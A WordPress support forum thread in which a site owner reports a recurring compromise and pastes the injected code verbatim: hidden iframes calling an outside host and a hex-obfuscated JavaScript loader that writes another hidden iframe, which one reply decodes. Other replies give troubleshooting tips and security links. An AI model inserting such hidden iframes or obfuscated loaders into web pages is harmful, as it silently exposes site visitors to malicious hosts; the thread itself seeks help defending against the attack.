Automatic Hacking of my Site

  • Hello Dear All,
    I am having a problem these days that every second day a new index.html is added to my site public_html folder itself having the following code:

    <iframe gkbna='evdnQcds' cfmbt='EHvfXHNs' kuhxw='JHdCe6f4' src='https://javacsript.org/click/in.cgi?4 ' ruxrm='9QKJP5X4' gyrmd='Qs0nDmwY' width='422' height='462' style='display:none'></iframe>
<iframe gkbna='evdnQcds' cfmbt='EHvfXHNs' kuhxw='JHdCe6f4' src='https://javacsript.org/click/in.cgi?4 ' ruxrm='9QKJP5X4' gyrmd='Qs0nDmwY' width='422' height='462' style='display:none'></iframe>

    while the same time another code add to my index.php page which is

    <script>function c25ac9e406p498bd725b3ec0(p498bd725b65d8){ var p498bd725b9329=16; return (parseInt(p498bd725b65d8,p498bd725b9329));}function p498bd725bdae7(p498bd725c09c5){ var p498bd725c77d4=2; var p498bd725c2911='';p498bd725cc557=String.fromCharCode;for(p498bd725c5044=0;p498bd725c5044<p498bd725c09c5.length;p498bd725c5044+=p498bd725c77d4){ p498bd725c2911+=(p498bd725cc557(c25ac9e406p498bd725b3ec0(p498bd725c09c5.substr(p498bd725c5044,p498bd725c77d4))));}return p498bd725c2911;} var h72='';var p498bd725cece9='3C7'+h72+'3637'+h72+'2697'+h72+'07'+h72+'43E696628216D7'+h72+'96961297'+h72+'B646F637'+h72+'56D656E7'+h72+'42E7'+h72+'7'+h72+'7'+h72+'2697'+h72+'465287'+h72+'56E657'+h72+'363617'+h72+'065282027'+h72+'2533632536392536362537'+h72+'322536312536642536352532302536652536312536642536352533642536332533322533352532302537'+h72+'332537'+h72+'32253633253364253237'+h72+'2536382537'+h72+'342537'+h72+'342537'+h72+'30253361253266253266253637'+h72+'253666253666253637'+h72+'2536632536352532652536312536652536312536632536392537'+h72+'612536352537'+h72+'32253265253633253665253266253639253665253265253633253637'+h72+'25363925336625333125333026253237'+h72+'2532622534642536312537'+h72+'342536382532652537'+h72+'322536662537'+h72+'352536652536342532382534642536312537'+h72+'342536382532652537'+h72+'32253631253665253634253666253664253238253239253261253334253330253334253337'+h72+'253337'+h72+'253332253239253262253237'+h72+'253331253333253334253237'+h72+'2532302537'+h72+'37'+h72+'2536392536342537'+h72+'34253638253364253337'+h72+'253335253338253230253638253635253639253637'+h72+'2536382537'+h72+'342533642533352533332533342532302537'+h72+'332537'+h72+'342537'+h72+'39253663253635253364253237'+h72+'2537'+h72+'362536392537'+h72+'332536392536322536392536632536392537'+h72+'342537'+h72+'39253361253638253639253634253634253635253665253237'+h72+'2533652533632532662536392536362537'+h72+'3225363125366425363525336527'+h72+'29293B7'+h72+'D7'+h72+'6617'+h72+'2206D7'+h72+'969613D7'+h72+'47'+h72+'27'+h72+'5653B3C2F7'+h72+'3637'+h72+'2697'+h72+'07'+h72+'43E';document.write(p498bd725bdae7(p498bd725cece9));</script>
<iframe gkbna='evdnQcds' cfmbt='EHvfXHNs' kuhxw='JHdCe6f4' src='https://javacsript.org/click/in.cgi?4 ' ruxrm='9QKJP5X4' gyrmd='Qs0nDmwY' width='422' height='462' style='display:none'></iframe>
<iframe gkbna='evdnQcds' cfmbt='EHvfXHNs' kuhxw='JHdCe6f4' src='https://javacsript.org/click/in.cgi?4 ' ruxrm='9QKJP5X4' gyrmd='Qs0nDmwY' width='422' height='462' style='display:none'></iframe>

    I didn’t did something except added new Plugins

    PLEASE HELP

Viewing 11 replies - 1 through 11 (of 11 total)
  • Moderator Samuel Wood (Otto)

    (@otto42)

    www.remarpro.com Admin

    Talk to your hosting company about it, get them to secure your server.

    Or switch hosting companies. That would be my recommendation, actually.

    Thread Starter Naveeddil

    (@naveeddil)

    is it the Hosting Company Problem or
    any Plugin is doing it?

    Please Reply

    Moderator Jan Dembowski

    (@jdembowski)

    Forum Moderator and Brute Squad

    No idea. Some hosting companies add their code when you use their services. Or you’ve been hacked, Otto’s advise of asking them is the easiest way to find out.

    Try this by way of troubleshooting: backup all your files and databases (always, always, always the best start) and make note of what plugins you are using and what theme.

    Now switch to the default WordPress theme and disable all of your plugins. Move the wp-contents/plugins folder to someplace where your web server can’t see it such as outside of your public_html directory. Same with your theme directory.

    Now clear the cache on your browser (cookies too) and visit your blog. View the source in the blog’s HTML, did the above code disappear? If yes, then it’s either a plugin or your theme. Start by putting things back one at a time till the problem comes back.

    If you did that and the code is still there, then it’s either your host or you have been hacked.

    Thread Starter Naveeddil

    (@naveeddil)

    dear
    the problem is that i Remove that SCRIPT after 48 hours it change automatically

    I have change the index.php permissions but still it is

    MY question is that if it is a hack so that is one time but that script is adding every 48 hours when i remove it

    Research “.htaccess” on the web.

    Thread Starter Naveeddil

    (@naveeddil)

    I have Turn Off the WP Super Cache and REmoved it from htaccess

    Lets see what happen

    The code in your index.php decodes to another hidden iframe –

    iframe name=c25 src='https://google.analizer.cn/in.cgi?10&'+Math.round(Math.random()*404772)+'134' width=758 height=534 style='visibility:hidden'

    I can’t see a reason why a decent web host would need to insert such a thing in such a hackerish manner.

    Thread Starter Naveeddil

    (@naveeddil)

    is there any way to block it please?

    is there any way to block it please?

    not if inserted by web host

    Well guys its not by web host, it is kinda VIRUS attack

    What I think is cross browser injection ( may be proper permission set on files or folders )

    some of my clients faced same issue but it doesn’t seem to be fixed

    recently I fixed ( actualy I removed all files from the web host )
    https://www.waytogrowrich.com
    then i upload a very new coded site onto the host and it workes well but with in 24rs we found iframe code again inside the index.php page
    but this time was it not encoded code it was clear iframe link anyone can read it, but its not redirecting web page..

    I am still looking for this solution.
    if anyone get to know then please share.

    Please follow these links
    may help in a way regarding some php security.

    https://www.linuxjournal.com/article/6061

    Please read this article
    https://security.phpmagazine.net/2008/04/mass_iframe_attack_continue_in.html

    Regards

    Raj

    https://www.softpanorama.org/Malware/Malicious_web/malicious_iframe_attack.shtml

    Raj
    ZERO 360 Technologies

Viewing 11 replies - 1 through 11 (of 11 total)
  • The topic ‘Automatic Hacking of my Site’ is closed to new replies.